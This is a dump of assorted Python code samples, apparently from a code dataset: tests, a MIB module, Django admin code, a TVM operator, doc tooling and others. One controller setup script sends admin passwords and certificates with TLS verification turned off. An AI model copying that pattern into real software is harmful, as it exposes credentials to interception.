id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
1694871 | from test.BaseCase import BaseCase
class TestDeleteMyArticle(BaseCase):
@BaseCase.login
def test_ok(self, token):
self.db.insert({"id": 2, "title": "My title"}, self.db.tables["Article"])
self.db.insert({"id": 3, "name": "My Company"}, self.db.tables["Company"])
self.db.insert({"article": 2, "company": 3}, self.db.tables["ArticleCompanyTag"])
self.db.insert({"user_id": 1, "company_id": 3}, self.db.tables["UserCompanyAssignment"])
self.db.insert({"property": "ALLOW_ECOSYSTEM_TO_EDIT_ARTICLE", "value": "TRUE"}, self.db.tables["Setting"])
payload = {"id": 2}
response = self.application.post('/private/delete_my_article',
headers=self.get_standard_post_header(token),
json=payload)
self.assertEqual(200, response.status_code)
@BaseCase.login
def test_ko_functionality_not_activated(self, token):
payload = {"id": 2}
response = self.application.post('/private/delete_my_article',
headers=self.get_standard_post_header(token),
json=payload)
self.assertEqual("403 The article edition is deactivated", response.status)
self.assertEqual(self.db.get_count(self.db.tables["Article"]), 0)
self.assertEqual(self.db.get_count(self.db.tables["ArticleVersion"]), 0)
@BaseCase.login
def test_ko_delete_unexisting(self, token):
self.db.insert({"property": "ALLOW_ECOSYSTEM_TO_EDIT_ARTICLE", "value": "TRUE"}, self.db.tables["Setting"])
payload = {"id": 2}
response = self.application.post('/private/delete_my_article',
headers=self.get_standard_post_header(token),
json=payload)
self.assertEqual("422 Object not found : Article", response.status)
@BaseCase.login
def test_ko_article_no_company_assigned(self, token):
self.db.insert({"id": 2, "title": "My title"}, self.db.tables["Article"])
self.db.insert({"id": 3, "name": "My Company"}, self.db.tables["Company"])
self.db.insert({"user_id": 1, "company_id": 3}, self.db.tables["UserCompanyAssignment"])
self.db.insert({"property": "ALLOW_ECOSYSTEM_TO_EDIT_ARTICLE", "value": "TRUE"}, self.db.tables["Setting"])
payload = {"id": 2}
response = self.application.post('/private/delete_my_article',
headers=self.get_standard_post_header(token),
json=payload)
self.assertEqual("422 Article has no company assigned", response.status)
@BaseCase.login
def test_ko_article_too_much_company_assigned(self, token):
self.db.insert({"id": 2, "title": "My title"}, self.db.tables["Article"])
self.db.insert({"id": 3, "name": "My Company"}, self.db.tables["Company"])
self.db.insert({"id": 4, "name": "My Company"}, self.db.tables["Company"])
self.db.insert({"article": 2, "company": 3}, self.db.tables["ArticleCompanyTag"])
self.db.insert({"article": 2, "company": 4}, self.db.tables["ArticleCompanyTag"])
self.db.insert({"property": "ALLOW_ECOSYSTEM_TO_EDIT_ARTICLE", "value": "TRUE"}, self.db.tables["Setting"])
payload = {"id": 2}
response = self.application.post('/private/delete_my_article',
headers=self.get_standard_post_header(token),
json=payload)
self.assertEqual("422 Article has too much companies assigned", response.status)
@BaseCase.login
def test_ko_user_not_assigned_to_company(self, token):
self.db.insert({"id": 2, "title": "My title"}, self.db.tables["Article"])
self.db.insert({"id": 3, "name": "My Company"}, self.db.tables["Company"])
self.db.insert({"article": 2, "company": 3}, self.db.tables["ArticleCompanyTag"])
self.db.insert({"property": "ALLOW_ECOSYSTEM_TO_EDIT_ARTICLE", "value": "TRUE"}, self.db.tables["Setting"])
payload = {"id": 2}
response = self.application.post('/private/delete_my_article',
headers=self.get_standard_post_header(token),
json=payload)
self.assertEqual("422 The user is not assign to the company", response.status) | StarcoderdataPython |
1601504 | #
# PySNMP MIB module SNMPv2-SMI-v1 (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/SNMPv2-SMI-v1
# Produced by pysmi-0.3.4 at Mon Apr 29 17:15:30 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
MibIdentifier, Counter32, iso, Gauge32, Unsigned32, Bits, TimeTicks, Integer32, Counter64, MibScalar, MibTable, MibTableRow, MibTableColumn, ModuleIdentity, NotificationType, IpAddress, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "Counter32", "iso", "Gauge32", "Unsigned32", "Bits", "TimeTicks", "Integer32", "Counter64", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ModuleIdentity", "NotificationType", "IpAddress", "ObjectIdentity")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
class Counter_32(Counter32):
pass
class Gauge_32(Gauge32):
pass
class Integer_32(Integer32):
subtypeSpec = Integer32.subtypeSpec + ValueRangeConstraint(-2147483648, 2147483647)
class Unsigned_32(Gauge32):
pass
internet = MibIdentifier((1, 3, 6, 1))
directory = MibIdentifier((1, 3, 6, 1, 1))
mgmt = MibIdentifier((1, 3, 6, 1, 2))
experimental = MibIdentifier((1, 3, 6, 1, 3))
private = MibIdentifier((1, 3, 6, 1, 4))
enterprises = MibIdentifier((1, 3, 6, 1, 4, 1))
security = MibIdentifier((1, 3, 6, 1, 5))
snmpV2 = MibIdentifier((1, 3, 6, 1, 6))
snmpDomains = MibIdentifier((1, 3, 6, 1, 6, 1))
snmpProxys = MibIdentifier((1, 3, 6, 1, 6, 2))
snmpModules = MibIdentifier((1, 3, 6, 1, 6, 3))
mibBuilder.exportSymbols("SNMPv2-SMI-v1", Unsigned_32=Unsigned_32, Counter_32=Counter_32, Integer_32=Integer_32, snmpProxys=snmpProxys, experimental=experimental, private=private, snmpModules=snmpModules, snmpV2=snmpV2, security=security, mgmt=mgmt, Gauge_32=Gauge_32, internet=internet, snmpDomains=snmpDomains, enterprises=enterprises, directory=directory)
| StarcoderdataPython |
3359143 | from numbers import Number
from probtorch.util import log_mean_exp
def elbo(q, p, sample_dim=None, batch_dim=None, alpha=0.1,
size_average=True, reduce=True):
r"""Calculates an importance weighted Monte Carlo estimate of the
semi-supervised evidence lower bound (ELBO)
.. math:: \frac{1}{B} \sum_{b=1}^B
\log \left[
\frac{1}{S} \sum_{s=1}^S
\frac{p(x^{(b)}, y^{(b)}, z^{(s,b)})}
{q(z^{(s,b)} | x^{(b)})}
\right]
+ \frac{\alpha}{B} \sum_{b=1}^B
\log \left[
\frac{1}{S} \sum_{s=1}^S
\frac{q(y^{(b)}, z^{(s,b)} | x^{(b)})}
{q(z^{(s,b)} | x^{(b)})}
\right]
The sets of variables :math:`x`, :math:`y` and :math:`z` refer to:
:math:`x`: The set of conditioned nodes that are present in `p` but
are not present in `q`.
:math:`y`: The set of conditioned nodes in `q`, which may or may
not also be present in `q`.
:math:`z`: The set of sampled nodes present in both `q` and `p`.
Arguments:
q(:obj:`Trace`): The encoder trace.
p(:obj:`Trace`): The decoder trace.
sample_dim(int, optional): The dimension containing individual samples.
batch_dim(int, optional): The dimension containing batch items.
alpha(float, default 0.1): Coefficient for the ML term.
size_average (bool, optional): By default, the objective is averaged
over items in the minibatch. When set to false, the objective is
instead summed over the minibatch.
reduce (bool, optional): By default, the objective is averaged or
summed over items in the minibatch. When reduce is False, losses
are returned without averaging or summation.
"""
z = [n for n in q.sampled() if n in p]
log_pxyz = p.log_joint(sample_dim, batch_dim)
log_qz = q.log_joint(sample_dim, batch_dim, z)
log_qy = q.log_joint(sample_dim, batch_dim, q.conditioned())
log_pq = (log_pxyz - log_qz)
if sample_dim is None:
objective = log_pq + alpha * log_qy
else:
objective = log_mean_exp(log_pq, 0)
if not isinstance(log_qy, Number):
objective = objective + alpha * log_mean_exp(log_qy, 0)
if reduce:
objective = objective.mean() if size_average else objective.sum()
return objective
| StarcoderdataPython |
4822614 | # Generated by Django 2.0.2 on 2018-03-01 02:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('finances', '0002_auto_20180227_2101'),
]
operations = [
migrations.AlterField(
model_name='customer',
name='address_line_2',
field=models.CharField(blank=True, max_length=50, null=True),
),
]
| StarcoderdataPython |
3221706 | import requests
import json
import sys
import urllib3
import time
#import re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ctrl=sys.argv[1]
priv_ip=sys.argv[2]
copilot=sys.argv[3]
pw=sys.argv[4]
version=sys.argv[5]
customer_id=sys.argv[6]
cplt_license=sys.argv[7]
email_address=sys.argv[8]
url = "https://%s/v1/backend1" % (ctrl)
url2 = "https://%s/v1/api" % (ctrl)
get_cid = {"action": "login_proc", "username": "admin", "password": <PASSWORD>_ip}
# Wait for the Controller API
r = None
while r is None:
try:
r = requests.post(url, data=get_cid, verify=False)
except:
pass
dict = json.loads(r.text)
print(r.text)
add_email = {"action": "add_admin_email_addr", "admin_email": email_address, "CID": dict['CID']}
r = requests.post(url2, data=add_email, verify=False)
print(r.text)
change_pw = {"action": "edit_account_user", "what": "password", "username": "admin", "old_password": priv_ip, "new_password": pw, "CID": dict['CID']}
r = requests.post(url2, data=change_pw, verify=False)
print(r.text)
random_step = {"action": "setup_network_options", "subaction": "cancel", "CID": dict['CID']}
r = requests.post(url2, data=random_step, verify=False)
print(r.text)
upgrade = {"action": "upgrade", "CID": dict['CID'], "version": version}
r = requests.post(url2, data=upgrade, verify=False)
print(r.text)
# Set Co-Pilot Password and License
s = requests.Session()
set_copilot = {"controllerIp": ctrl, "username": "admin", "password": pw}
cplt_url = 'https://%s/login' % (copilot)
r = s.post(cplt_url, data=set_copilot, verify=False)
cplt_url = 'https://%s/setlicense' % (copilot)
set_cplt_license = {"customerId": cplt_license}
r = s.post(cplt_url, data=set_cplt_license, verify=False)
print(r.text)
## Upload cert and key CoPilot
cplt_url = 'https://%s/addcertificate' % (copilot)
files = {'certificate': open('certificate.pem', 'rb'), 'certificateKey': open('private_key.pem', 'rb')}
r = s.post(cplt_url, files=files, verify=False)
print(r.text)
## Restart webapp
cplt_url = 'https://%s/services/restart/web' % (copilot)
try:
r = s.get(cplt_url, verify=False)
except Exception:
pass
# Set Netflow Agent on Controller
get_cid = {"action": "login_proc", "username": "admin", "password": pw}
r = requests.post(url, data=get_cid, verify=False)
dict = json.loads(r.text)
print(r.text)
enable_netflow = {"action": "enable_netflow_agent", "CID": dict['CID'], "server_ip": copilot, "port": "31283", "version": "9", "exclude_gateway_list": ""}
r = requests.post(url2, data=enable_netflow, verify=False)
print(r.text)
set_customer_id = {"action": "setup_customer_id", "CID": dict['CID'], "customer_id": customer_id}
r = requests.post(url2, data=set_customer_id, verify=False)
print(r.text)
## Upload Controller cert
file_list = [
('ca_cert', ('ca_cert.pem', open('./ca_cert.pem', 'r'), 'txt/txt')),
('server_cert', ('certificate.pem', open('./certificate.pem', 'r'), 'txt/txt')),
('private_key', ('private_key.pem', open('./private_key.pem', 'r'), 'txt/txt'))
]
data = {"action": "import_new_https_certs", "CID": dict['CID']}
r = requests.post(url2, data=data, files=file_list, verify=False)
print(r.text) | StarcoderdataPython |
101320 | <reponame>pmacosta/pplot<gh_stars>1-10
# compat2.py
# Copyright (c) 2013-2019 <NAME>
# See LICENSE for details
# pylint: disable=C0111,R1717,W0122,W0613
###
# Functions
###
def _readlines(fname): # pragma: no cover
"""Read all lines from file."""
with open(fname, "r") as fobj:
return fobj.readlines()
# Largely from From https://stackoverflow.com/questions/956867/
# how-to-get-string-objects-instead-of-unicode-ones-from-json-in-python
# with Python 2.6 compatibility changes
def _unicode_to_ascii(obj): # pragma: no cover
"""Convert to ASCII."""
# pylint: disable=E0602
if isinstance(obj, dict):
return dict(
[
(_unicode_to_ascii(key), _unicode_to_ascii(value))
for key, value in obj.items()
]
)
if isinstance(obj, list):
return [_unicode_to_ascii(element) for element in obj]
if isinstance(obj, unicode):
return obj.encode("utf-8")
return obj
def _write(fobj, data):
"""Write data to file."""
fobj.write(data)
| StarcoderdataPython |
3264534 | <filename>crawler/admin.py
import csv
import datetime
import string
from django.contrib import admin
from admin_auto_filters.filters import AutocompleteFilter
from django.http import HttpResponse
from crawler.models import Medicine, Generic, Manufacturer, DosageForm, Indication, DrugClass
# change selection list count
# https://stackoverflow.com/questions/36474515/how-to-get-filtered-queryset-in-django-admin/36476084#36476084
# filtering
# https://gist.github.com/ahmedshahriar/4240f0451261c4bb8364dd5341c7cf59
# https://books.agiliq.com/projects/django-admin-cookbook/en/latest/filtering_calculated_fields.html
class AlphabetFilter(admin.SimpleListFilter):
title = 'Name Alphabetically'
parameter_name = 'alphabet'
def lookups(self, request, model_admin):
abc = list(string.ascii_lowercase)
return ((c.upper(), c.upper()) for c in abc)
def queryset(self, request, queryset):
if self.value() and (queryset.model is Medicine):
return queryset.filter(brand_name__startswith=self.value())
if self.value() and (queryset.model is Generic):
return queryset.filter(generic_name__startswith=self.value())
if self.value() and (queryset.model is Manufacturer):
return queryset.filter(manufacturer_name__startswith=self.value())
class MedicineItemInline(admin.StackedInline):
model = Medicine
class GenericItemInline(admin.TabularInline):
model = Generic
def export_to_csv(model_admin, request, queryset):
opts = model_admin.model._meta
content_disposition = f'attachment; filename={opts.verbose_name}.csv'
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = content_disposition
writer = csv.writer(response)
fields = [field for field in opts.get_fields() if not field.many_to_many \
and not field.one_to_many]
# Write a first row with header information
writer.writerow([field.verbose_name for field in fields])
# Write data rows
for obj in queryset:
data_row = []
for field in fields:
value = getattr(obj, field.name)
if isinstance(value, datetime.datetime):
value = value.strftime('%d/%m/%Y')
data_row.append(value)
writer.writerow(data_row)
return response
export_to_csv.short_description = 'Export to CSV'
class GenericFilter(AutocompleteFilter):
title = 'Generic' # display title
field_name = 'generic' # name of the foreign key field
@admin.register(Medicine)
class MedicineAdmin(admin.ModelAdmin):
list_display = ('brand_id', 'brand_name', 'dosage_form', 'generic', 'manufacturer', 'type')
list_filter = (GenericFilter, AlphabetFilter, 'type', 'created', 'dosage_form', )
search_fields = ('brand_name', 'dosage_form')
prepopulated_fields = {'slug': ('brand_name',)}
raw_id_fields = ('generic', 'manufacturer')
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]
@admin.register(Generic)
class GenericAdmin(admin.ModelAdmin):
list_display = ('generic_id', 'generic_name', 'monograph_link', 'drug_class', 'indication', 'descriptions_count')
list_filter = ('created', 'descriptions_count', AlphabetFilter)
search_fields = ('generic_name',)
prepopulated_fields = {'slug': ('generic_name',)}
raw_id_fields = ('drug_class', 'indication')
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]
# readonly_fields = ('desc_count',) # add `desc_count` to list_display to display the number of descriptions
# https://books.agiliq.com/projects/django-admin-cookbook/en/latest/filtering_calculated_fields.html
@admin.register(Manufacturer)
class ManufacturerAdmin(admin.ModelAdmin):
list_display = ('manufacturer_id', 'manufacturer_name', 'generics_count', 'brand_names_count')
list_filter = ('created', AlphabetFilter,)
search_fields = ('manufacturer_name',)
prepopulated_fields = {'slug': ('manufacturer_name',)}
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]
inlines = [MedicineItemInline]
@admin.register(DosageForm)
class DosageFormAdmin(admin.ModelAdmin):
list_display = ('dosage_form_id', 'dosage_form_name', 'brand_names_count')
list_filter = ('created', AlphabetFilter,)
search_fields = ('dosage_form_name',)
prepopulated_fields = {'slug': ('dosage_form_name',)}
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]
@admin.register(Indication)
class IndicationAdmin(admin.ModelAdmin):
list_display = ('indication_id', 'indication_name', 'generics_count')
list_filter = ('created', AlphabetFilter,)
search_fields = ('indication_name',)
prepopulated_fields = {'slug': ('indication_name',)}
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]
inlines = [GenericItemInline]
@admin.register(DrugClass)
class DrugClassAdmin(admin.ModelAdmin):
list_display = ('drug_class_id', 'drug_class_name', 'generics_count')
list_filter = ('created', AlphabetFilter,)
search_fields = ('drug_class_name',)
prepopulated_fields = {'slug': ('drug_class_name',)}
date_hierarchy = 'created'
ordering = ('created',)
actions = [export_to_csv]
| StarcoderdataPython |
3247221 | #!/bin/env python
import libsedml
def create_nested_algorithm_example(file_name):
doc = libsedml.SedDocument(1, 4)
# create simulation
tc = doc.createUniformTimeCourse()
tc.setId("sim1")
tc.setInitialTime(0.0)
tc.setOutputStartTime(0.0)
tc.setOutputEndTime(10.0)
tc.setNumberOfPoints(1000)
# need to set the correct KISAO Term
alg = tc.createAlgorithm()
alg.setKisaoID("KISAO:0000352")
alg.setNotes("<p xmlns='http://www.w3.org/1999/xhtml'>a hybrid algorithm</p>")
p = alg.createAlgorithmParameter()
p.setKisaoID("KISAO:0000203")
p.setNotes("<p xmlns='http://www.w3.org/1999/xhtml'>particle number lower limit</p>")
p.setValue('2000')
p1 = p.createAlgorithmParameter()
p1.setKisaoID("KISAO:0000029")
p1.setNotes("<p xmlns='http://www.w3.org/1999/xhtml'>Gillespie Parameter here</p>")
p1.setValue('something')
p1 = p.createAlgorithmParameter()
p1.setKisaoID("KISAO:0000089")
p1.setNotes("<p xmlns='http://www.w3.org/1999/xhtml'>LSODA parameter here</p>")
p1.setValue('something else')
# write doc
libsedml.writeSedML(doc, file_name)
if __name__ == "__main__":
create_nested_algorithm_example('nested_example.xml')
| StarcoderdataPython |
19147 | import re
import string
import sys
from pyspark import SparkContext
exclude = set(string.punctuation)
def get_hash_tag(word, rmPunc):
pattern = re.compile("^#(.*)")
m = pattern.match(word)
tag = None
if m:
match = m.groups()
for m_word in match:
tag = ''.join(letter for letter in m_word if letter not in rmPunc)
if tag is not None:
return tag
sc = SparkContext("local", "Finidng Hash Tags")
rmPunc = sc.broadcast(exclude)
mydata = sc.textFile("hdfs://<hostname>:<port>/path/to/parsedata<first job output>")
wordsRDD = mydata.flatMap( lambda line : line.split("\t")[1].split(" "))
tagsRDD = wordsRDD.map( lambda word : get_hash_tag(word, rmPunc.value))
hashtagsRDD = tagsRDD.filter( lambda word : word is not None)
hashtagsRDD.saveAsTextFile("hdfs://<hostname>:<port>/path/to/hashtags")
| StarcoderdataPython |
148938 | <gh_stars>0
# Helper script to automatically create the doc folder
# Author: <NAME>
#
# Imports
#
import os
import shutil
from typing import List
#
# Constants
#
PROJECT: str = "py_crypto_hd_wallet"
DOC_FOLDER: str = os.path.join(".", PROJECT)
SRC_FOLDER: str = os.path.join("..", PROJECT)
DOC_EXT: str = ".rst"
SRC_EXT: str = ".py"
DOC_INDEX_FILE: str = "index" + DOC_EXT
UNDERLINE_CHAR: str = "="
TOCTREE_MAX_DEPTH: int = 10
DOC_FILE_TEMPLATE: str = """{module_name}
{title_underline}
.. automodule:: {module_path}
:members:
:undoc-members:
:show-inheritance:
"""
DOC_INDEX_TEMPLATE: str = """{index_name}
{title_underline}
.. toctree::
:maxdepth: {toctree_max_depth}
{modules_list}
"""
#
# Functions
#
def create_doc_main_dir() -> None:
shutil.rmtree(DOC_FOLDER, ignore_errors=True)
os.mkdir(DOC_FOLDER)
def is_dir_empty(d: str) -> bool:
return listdir_dirs(d) == [] and listdir_files(d) == []
def is_dir_valid(d: str) -> bool:
return not os.path.basename(d).startswith(("__", "."))
def is_file_valid(f: str) -> bool:
return not os.path.basename(f).startswith(("_", ".")) and f.find(SRC_EXT) != -1
def listdir_files(d: str) -> List[str]:
elems = [os.path.join(d, e) for e in os.listdir(d)]
return [e for e in elems
if os.path.isfile(e) and is_file_valid(e)]
def listdir_dirs(d: str) -> List[str]:
elems = [os.path.join(d, e) for e in os.listdir(d)]
return [e for e in elems
if os.path.isdir(e) and is_dir_valid(e) and not is_dir_empty(e)]
def src_to_doc_path(p: str) -> str:
return p.replace(SRC_FOLDER, DOC_FOLDER)
def src_to_doc_file(f: str) -> str:
return src_to_doc_path(f).replace(SRC_EXT, DOC_EXT)
def create_doc_dir(d: str) -> None:
doc_dir = src_to_doc_path(d)
os.mkdir(doc_dir)
print(f"Create doc directory: {doc_dir}")
def get_index_name(f: str) -> str:
return os.path.basename(f)
def get_index_modules_list(dirs: List[str], files: List[str]) -> str:
elems = list(map(lambda f: " " + get_module_name(f) + "/" + DOC_INDEX_FILE, dirs)) + \
list(map(lambda f: " " + get_module_name(f), files))
elems.sort()
return "\n".join(elems)
def get_module_name(f: str) -> str:
return os.path.basename(f).replace(DOC_EXT, "").replace(SRC_EXT, "")
def get_module_path(f: str) -> str:
return PROJECT + "." + f.replace(DOC_EXT, "").replace(DOC_FOLDER, "").replace("/", ".").replace("\\", ".")[1:]
def get_title_underline(m: str) -> str:
return UNDERLINE_CHAR * len(m)
def create_doc_file(f: str) -> None:
doc_file = src_to_doc_file(f)
with open(doc_file, "w") as fout:
module_name = get_module_name(doc_file)
fout.write(DOC_FILE_TEMPLATE.format(module_name=module_name,
title_underline=get_title_underline(module_name),
module_path=get_module_path(doc_file)))
print(f"Create doc file: {doc_file}")
def create_doc_index(d: str, dirs: List[str], files: List[str]) -> None:
if len(dirs) == 0 and len(files) == 0:
return
index_file = os.path.join(src_to_doc_path(d), DOC_INDEX_FILE)
with open(index_file, "w") as fout:
index_name = get_index_name(d)
fout.write(DOC_INDEX_TEMPLATE.format(index_name=index_name,
title_underline=get_title_underline(index_name),
toctree_max_depth=TOCTREE_MAX_DEPTH,
modules_list=get_index_modules_list(dirs, files)))
print(f"Create index file: {index_file}")
def create_doc(d: str) -> None:
files = listdir_files(d)
dirs = listdir_dirs(d)
for f in files:
create_doc_file(f)
create_doc_index(d, dirs, files)
for d in dirs:
create_doc_dir(d)
create_doc(d)
#
# Script
#
create_doc_main_dir()
create_doc(SRC_FOLDER)
| StarcoderdataPython |
1763493 | <filename>api_test_utils/env.py
import os
def api_env() -> str:
env = os.environ.get('APIGEE_ENVIRONMENT', 'internal-dev').strip().lower()
return env
def api_base_domain() -> str:
env = os.environ.get('API_BASE_DOMAIN', 'api.service.nhs.uk').strip().lower()
return env
def api_host(
env: str = None, base_domain: str = None
) -> str:
env = (env or api_env()).strip().lower()
base_domain = (base_domain or api_base_domain()).strip().lower()
host = (base_domain if env == 'prod' else f'{env}.{base_domain}').lower().strip()
return host
def api_base_path() -> str:
base_path = os.environ.get('SERVICE_BASE_PATH', '').strip().strip('/')
return base_path
def api_base_uri(
host: str = None, env: str = None, base_path: str = None, base_domain: str = None
) -> str:
env = (env or api_env()).strip().lower()
base_path = (base_path or api_base_path()).strip().strip('/')
host = (host or api_host(env=env, base_domain=base_domain)).lower().strip().strip('/')
base_uri = os.path.join(f"https://{host}", base_path)
return base_uri
def source_commit_id():
return os.environ.get('SOURCE_COMMIT_ID', 'not-set')
def status_endpoint_api_key():
return os.environ.get('STATUS_ENDPOINT_API_KEY', 'not-set')
| StarcoderdataPython |
1620827 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-variable
"""Transposed 2D convolution operators (sometimes called Deconvolution)."""
from __future__ import absolute_import as _abs
import tvm
from tvm import te
from tvm import autotvm
from ..nn import dilate, pad, get_pad_tuple
from ..util import get_const_tuple, traverse_inline
from .conv2d_spatial_pack import schedule_conv2d_spatial_pack_nchw
@autotvm.register_topi_compute("conv2d_transpose_nchw.arm_cpu")
def conv2d_transpose_nchw(cfg, Input, Filter, strides, padding, out_dtype,
output_padding):
"""Transposed 2D convolution nchw forward operator.
Parameters
----------
Input : tvm.te.Tensor
4-D with shape [batch, in_channel, in_height, in_width]
Filter : tvm.te.Tensor
4-D with shape [in_channel, num_filter, filter_height, filter_width]
strides : tuple of two ints
The spatial stride along height and width
padding : int or str
Padding size, or ['VALID', 'SAME']
out_dtype: str
The output data type. This is used for mixed precision.
output_padding : tuple of int
Used to get the right output shape in gradients
Returns
-------
Output : tvm.te.Tensor
4-D with shape [batch, out_channel, out_height, out_width]
"""
return _decl_spatial_pack(cfg, Input, Filter, strides, padding, "NCHW", out_dtype, 2,
output_padding)
def _decl_spatial_pack(cfg, data, kernel, strides, padding, layout, out_dtype, num_tile,
output_padding):
assert layout == "NCHW", "Only support NCHW"
out_dtype = out_dtype or data.dtype
N, CI, IH, IW = get_const_tuple(data.shape)
_, CO, KH, KW = get_const_tuple(kernel.shape)
HSTR, WSTR = strides if isinstance(strides, (tuple, list)) else (strides, strides)
opad_h, opad_w = output_padding
assert opad_h < HSTR and opad_w < WSTR
pad_top, pad_left, pad_bottom, pad_right = get_pad_tuple(padding, (KH, KW))
bpad_top, bpad_bottom = KH - 1 - pad_top, KH - 1 - pad_bottom + opad_h
bpad_left, bpad_right = KW - 1 - pad_left, KW - 1 - pad_right + opad_w
OH = (IH - 1) * HSTR - pad_top - pad_bottom + KH + opad_h
OW = (IW - 1) * WSTR - pad_left - pad_right + KW + opad_w
dilated_input = dilate(data, [1, 1, HSTR, WSTR])
data_pad = pad(dilated_input, [0, 0, bpad_top, bpad_left], [0, 0, bpad_bottom, bpad_right])
# ==================== define configuration space ====================
n, co, oh, ow = cfg.axis(N), cfg.axis(CO), cfg.axis(OH), cfg.axis(OW)
ci, kh, kw = cfg.reduce_axis(CI), cfg.reduce_axis(KH), cfg.reduce_axis(KW)
if num_tile == 2: # for arm cpu
co, vc = cfg.define_split('tile_co', co, num_outputs=2)
oh, vh = cfg.define_split('tile_oh', oh, num_outputs=2)
ow, vw = cfg.define_split('tile_ow', ow, num_outputs=2)
elif num_tile == 3: # for mali gpu
co, _, vc = cfg.define_split('tile_co', co, num_outputs=3)
oh, _, vh = cfg.define_split('tile_oh', oh, num_outputs=3)
ow, _, vw = cfg.define_split('tile_ow', ow, num_outputs=3)
else:
raise RuntimeError("Invalid num_tile")
cfg.define_reorder("reorder_0",
[n, co, oh, ow, ci, kh, kw, vh, vw, vc],
policy='candidate', candidate=[
[n, co, oh, ow, ci, kh, kw, vh, vw, vc],
[n, co, oh, ow, ci, kh, kw, vc, vh, vw]])
cfg.define_annotate("ann_reduce", [kh, kw], policy='try_unroll')
cfg.define_annotate("ann_spatial", [vh, vw, vc], policy='try_unroll_vec')
# ====================================================================
VC = cfg["tile_co"].size[-1]
VH = cfg["tile_oh"].size[-1]
VW = cfg["tile_ow"].size[-1]
dvshape = (N, OH // VH, OW // VW, CI, VH + KH-1, VW + KW-1)
kvshape = (CO // VC, CI, KH, KW, VC)
ovshape = (N, CO // VC, OH // VH, OW // VW, VH, VW, VC)
oshape = (N, CO, OH, OW)
data_vec = te.compute(dvshape, lambda n, h, w, ci, vh, vw:
data_pad[n][ci][h*VH + vh][w*VW + vw],
name='data_vec')
kernel_vec = te.compute(kvshape, lambda co, ci, kh, kw, vc:
kernel[ci][co*VC+vc][kh][kw],
name='kernel_vec_conv2d_transpose')
ci = te.reduce_axis((0, CI), name='ci')
kh = te.reduce_axis((0, KH), name='kh')
kw = te.reduce_axis((0, KW), name='kw')
conv = te.compute(ovshape, lambda n, co, h, w, vh, vw, vc: \
te.sum(data_vec[n, h, w, ci, vh + kh, vw + kw].astype(out_dtype) *
kernel_vec[co, ci, KH - 1 - kh, KW - 1 - kw, vc].astype(out_dtype),
axis=[ci, kh, kw]), name='conv')
idxdiv = tvm.tir.indexdiv
idxmod = tvm.tir.indexmod
output = te.compute(oshape, lambda n, co, h, w:
conv[n,
idxdiv(co, VC), idxdiv(h, VH), idxdiv(w, VW),
idxmod(h, VH), idxmod(w, VW), idxmod(co, VC)],
name='output_unpack', tag='spatial_conv2d_transpose_output')
return output
# register customized schedule for arm cpu.
@autotvm.register_topi_schedule("conv2d_transpose_nchw.arm_cpu")
def schedule_conv2d_transpose_nchw(cfg, outs):
"""Schedule conv2d transpose for arm cpu"""
s = te.create_schedule([x.op for x in outs])
def _callback(op):
if 'spatial_conv2d_transpose_output' in op.tag:
output = op.output(0)
conv = op.input_tensors[0]
data_vec = conv.op.input_tensors[0]
data_pad = data_vec.op.input_tensors[0]
dilated_input = data_pad.op.input_tensors[0]
s[data_pad].compute_inline()
s[dilated_input].compute_inline()
kernel_vec = conv.op.input_tensors[1]
if kernel_vec.op.name == 'kernel_vec':
kernel = kernel_vec.op.input_tensors[0]
else:
kernel = kernel_vec
if isinstance(kernel.op, tvm.te.ComputeOp) and "dilate" in kernel.op.tag:
s[kernel].compute_inline()
schedule_conv2d_spatial_pack_nchw(cfg, s, data_vec, kernel_vec,
conv, output, outs[0])
traverse_inline(s, outs[0].op, _callback)
return s
| StarcoderdataPython |
1629777 | import subprocess
import omegaconf
from hydra.utils import instantiate
from pathlib import Path
def _load_dataset(
data_files,
extension="json",
test_split_percentage=10,
min_tokens=5,
download_mode="reuse_dataset_if_exists",
num_proc=1,
):
from datasets import load_dataset
dataset = {}
if test_split_percentage > 0:
dataset["test"] = load_dataset(
extension,
data_files=data_files,
split=f"train[:{test_split_percentage}%]",
download_mode=download_mode,
)
dataset["train"] = load_dataset(
extension,
data_files=data_files,
split=f"train[{test_split_percentage}%:]",
)
else:
dataset = load_dataset(
extension, data_files=data_files, download_mode=download_mode
)
for name in dataset:
n_proc = min(num_proc, len(dataset[name]) - 1)
cols = dataset[name].column_names
